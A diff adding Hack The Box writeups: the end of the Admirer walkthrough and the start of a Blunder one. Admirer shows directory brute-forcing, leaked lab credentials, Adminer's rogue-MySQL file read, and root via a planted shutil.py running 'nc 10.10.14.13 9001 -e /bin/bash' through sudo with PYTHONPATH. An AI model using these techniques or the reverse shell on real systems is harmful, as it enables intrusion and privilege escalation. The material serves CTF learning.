+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.187
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: php
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/31 13:07:07 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /index.php (Status: 200) [Size: 6051]
+ /assets (Status: 301) [Size: 313] [--> http://10.10.10.187/assets/]
+ /images (Status: 301) [Size: 313] [--> http://10.10.10.187/images/]
+ /server-status (Status: 403) [Size: 277]
+
+ ===============================================================
+ 2021/05/31 13:13:11 Finished
+ ===============================================================
+
+
+
+Now the trick here was not run gobuster from the root of the webserver, but from the **/admin-dir** directory that is supposed to be 403 forbidden.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php -t 50
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.187/admin-dir
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: php
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/31 13:14:57 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htaccess (Status: 403) [Size: 277]
+ /.htpasswd (Status: 403) [Size: 277]
+ /.htpasswd.php (Status: 403) [Size: 277]
+ /.hta (Status: 403) [Size: 277]
+ /.htaccess.php (Status: 403) [Size: 277]
+ /.hta.php (Status: 403) [Size: 277]
+ **/contacts.txt (Status: 200) [Size: 350]
+ /credentials.txt (Status: 200) [Size: 136]**
+
+ ===============================================================
+ 2021/05/31 13:15:07 Finished
+ ===============================================================
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → curl http://10.10.10.187/robots.txt
+ User-agent: *
+
+ # This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
+ Disallow: /admin-dir
+
+
+
+And here we see that we have been able to get access to 2 textfiles that, according to robots.txt wasn't possible to access, but it was! so let's see what we got:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → curl http://10.10.10.187/admin-dir/contacts.txt
+ ##########
+ # admins #
+ ##########
+ # Penny
+ Email: p.wise@admirer.htb
+
+
+ ##############
+ # developers #
+ ##############
+ # Rajesh
+ Email: r.nayyar@admirer.htb
+
+ # Amy
+ Email: a.bialik@admirer.htb
+
+ # Leonard
+ Email: l.galecki@admirer.htb
+
+
+
+ #############
+ # designers #
+ #############
+ # Howard
+ Email: h.helberg@admirer.htb
+
+ # Bernadette
+ Email: b.rauch@admirer.htb
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → curl http://10.10.10.187/admin-dir/credentials.txt
+ [Internal mail account]
+ w.cooper@admirer.htb
+ fgJr6q#S\W:$P
+
+ **[FTP account]
+ ftpuser
+ %n?4Wz}R$tTF7**
+
+ [Wordpress account]
+ admin
+ w0rdpr3ss01!
+
+
+
+So here we get a few usernames, and with passwords, let's take a look at the ftp service first:
+
+ 
+
+we download both files:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → ls -lash
+ total 5.1M
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K May 31 13:46 .
+ 4.0K drwxr-xr-x 11 nothing nothing 4.0K May 31 11:40 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 3.4K May 31 13:46 dump.sql
+ 5.1M -rw-r--r-- 1 nothing nothing 5.1M May 31 13:46 html.tar.gz
+
+
+Let's take a look at the sql file we found:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → cat dump.sql
+ -- MySQL dump 10.16 Distrib 10.1.41-MariaDB, for debian-linux-gnu (x86_64)
+ --
+ -- Host: localhost Database: admirerdb
+ -- ------------------------------------------------------
+ -- Server version 10.1.41-MariaDB-0+deb9u1
+
+ /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
+ /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
+ /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
+ /*!40101 SET NAMES utf8mb4 */;
+ /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
+ /*!40103 SET TIME_ZONE='+00:00' */;
+ /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
+ /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
+ /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
+ /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
+
+ --
+ -- Table structure for table `items`
+ --
+
+ DROP TABLE IF EXISTS `items`;
+ /*!40101 SET @saved_cs_client = @@character_set_client */;
+ /*!40101 SET character_set_client = utf8 */;
+ CREATE TABLE `items` (
+ `id` int(11) NOT NULL AUTO_INCREMENT,
+ `thumb_path` text NOT NULL,
+ `image_path` text NOT NULL,
+ `title` text NOT NULL,
+ `text` text,
+ PRIMARY KEY (`id`)
+ ) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4;
+ /*!40101 SET character_set_client = @saved_cs_client */;
+
+ --
+ -- Dumping data for table `items`
+ --
+
+ LOCK TABLES `items` WRITE;
+ /*!40000 ALTER TABLE `items` DISABLE KEYS */;
+ INSERT INTO `items` VALUES (1,'images/thumbs/thmb_art01.jpg','images/fulls/art01.jpg','Visual Art','A pure showcase of skill and emotion.'),(2,'images/thumbs/thmb_eng02.jpg','images/fulls/eng02.jpg','The Beauty and the Beast','Besides the technology, there is also the eye candy...'),(3,'images/thumbs/thmb_nat01.jpg','images/fulls/nat01.jpg','The uncontrollable lightshow','When the sun decides to play at night.'),(4,'images/thumbs/thmb_arch02.jpg','images/fulls/arch02.jpg','Nearly Monochromatic','One could simply spend hours looking at this indoor square.'),(5,'images/thumbs/thmb_mind01.jpg','images/fulls/mind01.jpg','Way ahead of his time','You probably still use some of his inventions... 500yrs later.'),(6,'images/thumbs/thmb_mus02.jpg','images/fulls/mus02.jpg','The outcomes of complexity','Seriously, listen to Dust in Interstellar\'s OST. Thank me later.'),(7,'images/thumbs/thmb_arch01.jpg','images/fulls/arch01.jpg','Back to basics','And centuries later, we want to go back and live in nature... Sort of.'),(8,'images/thumbs/thmb_mind02.jpg','images/fulls/mind02.jpg','We need him back','He might have been a loner who allegedly slept with a pigeon, but that brain...'),(9,'images/thumbs/thmb_eng01.jpg','images/fulls/eng01.jpg','In the name of Science','Some theories need to be proven.'),(10,'images/thumbs/thmb_mus01.jpg','images/fulls/mus01.jpg','Equal Temperament','Because without him, music would not exist (as we know it today).');
+ /*!40000 ALTER TABLE `items` ENABLE KEYS */;
+ UNLOCK TABLES;
+ /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
+
+ /*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
+ /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
+ /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
+ /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
+ /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
+ /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
+ /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
+
+ -- Dump completed on 2019-12-02 20:24:15
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → tar -xvf html.tar.gz
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → tree
+ .
+ ├── assets
+ │ ├── css
+ │ │ ├── fontawesome-all.min.css
+ │ │ ├── images
+ │ │ │ ├── arrow.svg
+ │ │ │ ├── close.svg
+ │ │ │ └── spinner.svg
+ │ │ ├── main.css
+ │ │ └── noscript.css
+ │ ├── js
+ │ │ ├── breakpoints.min.js
+ │ │ ├── browser.min.js
+ │ │ ├── jquery.min.js
+ │ │ ├── jquery.poptrox.min.js
+ │ │ ├── main.js
+ │ │ └── util.js
+ │ ├── sass
+ │ │ ├── base
+ │ │ │ ├── _page.scss
+ │ │ │ ├── _reset.scss
+ │ │ │ └── _typography.scss
+ │ │ ├── components
+ │ │ │ ├── _actions.scss
+ │ │ │ ├── _button.scss
+ │ │ │ ├── _form.scss
+ │ │ │ ├── _icon.scss
+ │ │ │ ├── _icons.scss
+ │ │ │ ├── _list.scss
+ │ │ │ ├── _panel.scss
+ │ │ │ ├── _poptrox-popup.scss
+ │ │ │ └── _table.scss
+ │ │ ├── layout
+ │ │ │ ├── _footer.scss
+ │ │ │ ├── _header.scss
+ │ │ │ ├── _main.scss
+ │ │ │ └── _wrapper.scss
+ │ │ ├── libs
+ │ │ │ ├── _breakpoints.scss
+ │ │ │ ├── _functions.scss
+ │ │ │ ├── _mixins.scss
+ │ │ │ ├── _vars.scss
+ │ │ │ └── _vendor.scss
+ │ │ ├── main.scss
+ │ │ └── noscript.scss
+ │ └── webfonts
+ │ ├── fa-brands-400.eot
+ │ ├── fa-brands-400.svg
+ │ ├── fa-brands-400.ttf
+ │ ├── fa-brands-400.woff
+ │ ├── fa-brands-400.woff2
+ │ ├── fa-regular-400.eot
+ │ ├── fa-regular-400.svg
+ │ ├── fa-regular-400.ttf
+ │ ├── fa-regular-400.woff
+ │ ├── fa-regular-400.woff2
+ │ ├── fa-solid-900.eot
+ │ ├── fa-solid-900.svg
+ │ ├── fa-solid-900.ttf
+ │ ├── fa-solid-900.woff
+ │ └── fa-solid-900.woff2
+ ├── dump.sql
+ ├── html.tar.gz
+ ├── images
+ │ ├── fulls
+ │ │ ├── arch01.jpg
+ │ │ ├── arch02.jpg
+ │ │ ├── art01.jpg
+ │ │ ├── art02.jpg
+ │ │ ├── eng01.jpg
+ │ │ ├── eng02.jpg
+ │ │ ├── mind01.jpg
+ │ │ ├── mind02.jpg
+ │ │ ├── mus01.jpg
+ │ │ ├── mus02.jpg
+ │ │ ├── nat01.jpg
+ │ │ └── nat02.jpg
+ │ └── thumbs
+ │ ├── thmb_arch01.jpg
+ │ ├── thmb_arch02.jpg
+ │ ├── thmb_art01.jpg
+ │ ├── thmb_art02.jpg
+ │ ├── thmb_eng01.jpg
+ │ ├── thmb_eng02.jpg
+ │ ├── thmb_mind01.jpg
+ │ ├── thmb_mind02.jpg
+ │ ├── thmb_mus01.jpg
+ │ ├── thmb_mus02.jpg
+ │ ├── thmb_nat01.jpg
+ │ └── thmb_nat02.jpg
+ **├── index.php**
+ ├── robots.txt
+ ├── utility-scripts
+ │ ├── admin_tasks.php
+ │ ├── db_admin.php
+ │ ├── info.php
+ │ └── phptest.php
+ └── w4ld0s_s3cr3t_d1r
+ ├── contacts.txt
+ └── credentials.txt
+
+
+
+We take a look into index.php:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → cat index.php
+
+ [...]
+ <****?php
+ $servername = "localhost";
+ $username = "waldo";
+ $password = "]F7jLHw:*G>UPrTo}~A"d6b";
+ $dbname = "admirerdb";
+
+ [...]
+
+We have also found it using grep recursively:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → grep -ir password
+ **index.php: $password = "]F7jLHw:*G>UPrTo}~A"d6b";**
+ index.php: $conn = new mysqli($servername, $username, $password, $dbname);
+ **utility-scripts/db_admin.php: $password = "Wh3r3_1s_w4ld0?";**
+ utility-scripts/db_admin.php: $conn = new mysqli($servername, $username, $password);
+ assets/css/main.css: input[type="password"],
+ assets/css/main.css: input[type="password"]:invalid,
+ assets/css/main.css: input[type="password"]:focus,
+ assets/css/main.css: input[type="password"],
+
+ [...]
+
+
+
+Here we see yet another password **Wh3r3_1s_w4ld0**
+
+There is also info.php available onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → ls -lash utility-scripts
+ total 24K
+ 4.0K drwxr-x--- 2 nothing nothing 4.0K Dec 2 2019 .
+ 4.0K drwxr-xr-x 6 nothing nothing 4.0K May 31 13:55 ..
+ 4.0K -rw-r----- 1 nothing nothing 1.8K Dec 2 2019 admin_tasks.php
+ 4.0K -rw-r----- 1 nothing nothing 401 Dec 1 2019 db_admin.php
+ 4.0K -rw-r----- 1 nothing nothing 20 Nov 29 2019 info.php
+ 4.0K -rw-r----- 1 nothing nothing 53 Dec 2 2019 phptest.php
+
+
+
+` 
+
+So now we know that the server is running PHP version 7.0, but let's take a look at adnin_tasks.php:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → cat admin_tasks.php | grep exec
+ echo str_replace("\n", "
+ ", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
+
+
+Which reveals us the admin_tasks.sh bashscript which is in the /opt/ directory so we can't read it's sourcecode yet. Now the trick here was that the utility-scripts directory does have an extra php file, and in order to find it we need to use a bigger wordlist against said directory:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → gobuster dir -u http://10.10.10.187/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/big.txt --extensions php,txt -t 50
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.187/utility-scripts/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: php,txt
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/31 15:49:44 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htaccess.txt (Status: 403) [Size: 277]
+ /.htpasswd (Status: 403) [Size: 277]
+ /.htaccess (Status: 403) [Size: 277]
+ /.htpasswd.txt (Status: 403) [Size: 277]
+ /.htaccess.php (Status: 403) [Size: 277]
+ /.htpasswd.php (Status: 403) [Size: 277]
+ **/adminer.php (Status: 200) [Size: 4294]**
+ /info.php (Status: 200) [Size: 83771]
+ /phptest.php (Status: 200) [Size: 32]
+
+ ===============================================================
+ 2021/05/31 15:50:38 Finished
+ ===============================================================
+
+
+
+Which leads us to the **adminer** php webpage which we didn't see before in the html tar gz file:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → searchsploit adminer
+ -------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ -------------------------------------------- ---------------------------------
+ Adminer 4.3.1 - Server-Side Request Forgery | php/webapps/43593.txt
+ -------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+now that we know that there is an exploit for this service:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → cat $(locate 43593.txt)
+
+
+
+But we can also find it [here](https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability):
+
+ 
+
+Looking at this blogpost, we already found adminer.php on the system, and what's left to do is to create our own malicious MySQL server since external connections should be possible. So let's try it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → sudo apt install mariadb-server mariadb-client
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → sudo systemctl start mariadb
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → mysql -u root -p
+ Enter password:
+ ERROR 1698 (28000): Access denied for user 'root'@'localhost'
+
+
+That's because you need to be the root user to setup mysql:
+
+
+ ┌──(root💀nowhere)-[~]
+ └─# mysql -u root -p
+ Enter password:
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 57
+ Server version: 10.5.9-MariaDB-1 Debian buildd-unstable
+
+ Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]>
+
+
+Now let's setup our database:
+
+
+ MariaDB [(none)]> ALTER USER 'root'@'localhost' IDENTIFIED BY 'P@SSW0RD';
+ Query OK, 0 rows affected (0.004 sec)
+
+ MariaDB [(none)]> CREATE DATABASE backup; USE backup; CREATETABLE backup (name VARCHAR(2000));
+ Query OK, 1 row affected (0.000 sec)
+
+ MariaDB [backup]> CREATE DATABASE backup; USE backup; CREATE TABLE backup (name VARCHAR(2000));
+ ERROR 1007 (HY000): Can't create database 'backup'; database exists
+ Database changed
+ Query OK, 0 rows affected (0.029 sec)
+
+ MariaDB [backup]> CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY 'P@SSW0RD';
+ Query OK, 0 rows affected (0.004 sec)
+
+ MariaDB [backup]> GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187';
+ Query OK, 0 rows affected (0.004 sec)
+
+
+once that's done, we make sure that our mysql instance can communicate to our tun0 interface:
+
+
+ MariaDB [backup]> exit;
+ Bye
+
+ ┌──(root💀nowhere)-[~]
+ └─# vim /etc/mysql/mariadb.conf.d/50-server.cnf
+
+ [...]
+
+ bind-address = 10.10.14.13 # and not 127.0.0.1
+
+ [...]
+
+ :wq
+
+ ┌──(root💀nowhere)-[~]
+ └─# systemctl restart mariadb
+
+
+Once we restarted mariadb we see that we can see that our mysql port is up and running for our htb ip:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Admirer]
+ → nmap -p 3306 10.10.14.13
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 17:58 CEST
+ Nmap scan report for 10.10.14.13
+ Host is up (0.000050s latency).
+
+ PORT STATE SERVICE
+ 3306/tcp open mysql
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
+
+
+
+` 
+
+After logging in, go to the SQL command pane:
+
+
+
+Next step is to make use of the **load data** function to examine files on the machine:
+
+
+ load data local infile '../index.php'
+ into table backup
+ fields terminated by "/n"
+
+
+
+`  
+
+and now the index.php file got imported into the backup mysql database, so we simply check it's structure to see it's contents:
+
+
+
+And we got waldo's credentials ! **waldo: &<****h5b~yK3F#{PaPB &dA;}{H>**, so let's login as waldo via ssh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Admirer]
+ → ssh waldo@10.10.10.187
+ The authenticity of host '10.10.10.187 (10.10.10.187)' can't be established.
+ ECDSA key fingerprint is SHA256:NSIaytJ0GOq4AaLY0wPFdPsnuw/wBUt2SvaCdiFM8xI.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.187' (ECDSA) to the list of known hosts.
+ waldo@10.10.10.187's password:
+ Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux
+
+ The programs included with the Devuan GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ You have new mail.
+ Last login: Wed Apr 29 10:56:59 2020 from 10.10.14.3
+ waldo@admirer:~$ id
+ uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
+ waldo@admirer:~$ cat user.txt
+ 3cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+to privesc to the root user, we first need to run linpeas.sh to enumerate the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Admirer]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Admirer]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ waldo@admirer:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/linpeas.sh
+ --2021-05-31 19:54:54-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/linpeas.sh’
+
+ /tmp/linpeas.sh 100%[==========================================================================================================================================================>] 333.85K 701KB/s in 0.5s
+
+ 2021-05-31 19:54:55 (701 KB/s) - ‘/tmp/linpeas.sh’ saved [341863/341863]
+
+ waldo@admirer:~$ chmod +x /tmp/linpeas.sh
+ waldo@admirer:~$ /tmp/linpeas.sh
+
+
+
+` 
+
+And searching through it we get hinted towards the **admin_tasks.sh** script we heard of earlier:
+
+
+ waldo@admirer:~$ sudo -l
+ [sudo] password for waldo:
+ Matching Defaults entries for waldo on admirer:
+ env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
+
+ User waldo may run the following commands on admirer:
+ (ALL) SETENV: /opt/scripts/admin_tasks.sh
+
+
+
+So let's see what it does:
+
+
+ waldo@admirer:~$ cat /opt/scripts/admin_tasks.sh
+ #!/bin/bash
+
+ view_uptime()
+ {
+ /usr/bin/uptime -p
+ }
+
+ view_users()
+ {
+ /usr/bin/w
+ }
+
+ view_crontab()
+ {
+ /usr/bin/crontab -l
+ }
+
+ backup_passwd()
+ {
+ if [ "$EUID" -eq 0 ]
+ then
+ echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
+ /bin/cp /etc/passwd /var/backups/passwd.bak
+ /bin/chown root:root /var/backups/passwd.bak
+ /bin/chmod 600 /var/backups/passwd.bak
+ echo "Done."
+ else
+ echo "Insufficient privileges to perform the selected operation."
+ fi
+ }
+
+ backup_shadow()
+ {
+ if [ "$EUID" -eq 0 ]
+ then
+ echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
+ /bin/cp /etc/shadow /var/backups/shadow.bak
+ /bin/chown root:shadow /var/backups/shadow.bak
+ /bin/chmod 600 /var/backups/shadow.bak
+ echo "Done."
+ else
+ echo "Insufficient privileges to perform the selected operation."
+ fi
+ }
+
+ backup_web()
+ {
+ if [ "$EUID" -eq 0 ]
+ then
+ echo "Running backup script in the background, it might take a while..."
+ **/opt/scripts/backup.py &**
+ else
+ echo "Insufficient privileges to perform the selected operation."
+ fi
+ }
+
+ [...]
+
+
+
+Here we see that the bashscript, which we can run as the root user through sudo, can call for a python script named **backup.py** from the **/opt/scripts/** directory. Therefore,
+
+
+ waldo@admirer:~$ which nc
+ /bin/nc
+
+ waldo@admirer:~$ cat /opt/scripts/backup.py
+ #!/usr/bin/python3
+
+ from shutil import make_archive
+
+ src = '/var/www/html/'
+
+ # old ftp directory, not used anymore
+ #dst = '/srv/ftp/html'
+
+ dst = '/var/backups/html'
+
+ make_archive(dst, 'gztar', src)
+
+
+
+Since netcat is there on the box, We're going to perform a python library hijacking, and we're going to hijack the **shutil** library in particular:
+
+
+ waldo@admirer:~$ mkdir /tmp/nihilist777
+ waldo@admirer:~$ nano /tmp/nihilist777/shutil.py
+ waldo@admirer:~$ cat /tmp/nihilist777/shutil.py
+ import os
+
+ def make_archive(a,b,c):
+ os.system("nc 10.10.14.13 9001 -e '/bin/bash'")
+
+
+
+then we modify the value of the **PYTHONPATH** environment variable to access our **/tmp/nihilist777** directory:
+
+
+ waldo@admirer:~$ PYTHONPATH=/tmp/nihilist777
+ waldo@admirer:~$ echo $PYTHONPATH
+ /tmp/nihilist777
+
+ waldo@admirer:~$ sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh
+ waldo@admirer:~$ sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh
+ [sudo] password for waldo:
+
+ [[[ System Administration Menu ]]]
+ 1) View system uptime
+ 2) View logged in users
+ 3) View crontab
+ 4) Backup passwd file
+ 5) Backup shadow file
+ 6) Backup web data
+ 7) Backup DB
+ 8) Quit
+ Choose an option: 6
+
+ [ 10.10.14.13/23 ] [ /dev/pts/55 ] [~/HTB/Admirer]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.187] 42986
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ cat /root/root.txt
+ cdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get a reverse shell as the root user, and get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/47.md b/Easy/47.md
new file mode 100644
index 0000000..054a1ff
--- /dev/null
+++ b/Easy/47.md
@@ -0,0 +1,523 @@
+# Blunder Writeup
+
+
+
+## Introduction :
+
+Blunder is an Easy Linux box released back in May 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → nmap -vvv -p- 10.10.10.191 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.191
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → nmap -sCV -p 80 10.10.10.191
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 10:16 CEST
+ Nmap scan report for 10.10.10.191
+ Host is up (0.036s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-generator: Blunder
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Blunder | A blunder of interesting facts
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's examine it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → gobuster dir -u http://10.10.10.191 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -x txt,pdf,php,html
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.191
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: txt,pdf,php,html
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/06/01 14:36:08 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htpasswd.php (Status: 403) [Size: 277]
+ /.htpasswd.html (Status: 403) [Size: 277]
+ /.gitignore (Status: 200) [Size: 563]
+ /.htaccess (Status: 403) [Size: 277]
+ /.hta.html (Status: 403) [Size: 277]
+ /.htpasswd (Status: 403) [Size: 277]
+ /.git/logs/ (Status: 301) [Size: 0] [--> http://10.10.10.191/.git/logs]
+ /.htaccess.pdf (Status: 403) [Size: 277]
+ /.hta (Status: 403) [Size: 277]
+ /.htpasswd.txt (Status: 403) [Size: 277]
+ /.hta.txt (Status: 403) [Size: 277]
+ /.htaccess.php (Status: 403) [Size: 277]
+ /.htpasswd.pdf (Status: 403) [Size: 277]
+ /.hta.pdf (Status: 403) [Size: 277]
+ /.htaccess.html (Status: 403) [Size: 277]
+ /.hta.php (Status: 403) [Size: 277]
+ /.htaccess.txt (Status: 403) [Size: 277]
+ /0 (Status: 200) [Size: 7562]
+ /LICENSE (Status: 200) [Size: 1083]
+ /about (Status: 200) [Size: 3281]
+ /admin (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
+ /cgi-bin/ (Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin]
+ /install.php (Status: 200) [Size: 30]
+ /robots.txt (Status: 200) [Size: 22]
+ /robots.txt (Status: 200) [Size: 22]
+ /server-status (Status: 403) [Size: 277]
+ /todo.txt (Status: 200) [Size: 118]
+
+ ===============================================================
+ 2021/06/01 14:38:34 Finished
+ ===============================================================
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → curl http://10.10.10.191/install.php
+ Bludit is already installed ;)%
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → curl http://10.10.10.191/todo.txt
+ -Update the CMS
+ -Turn off FTP - DONE
+ -Remove old users - DONE
+ -Inform fergus that the new blog needs images - PENDING
+
+
+
+So here get hinted towards a **fergus** username, but most importantly we learn that we may have an outdated Bludit instance, and we look at the index page to find it's version:
+
+
+
+We can hypothesize that we have a Bludit instance version 3.9.2:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
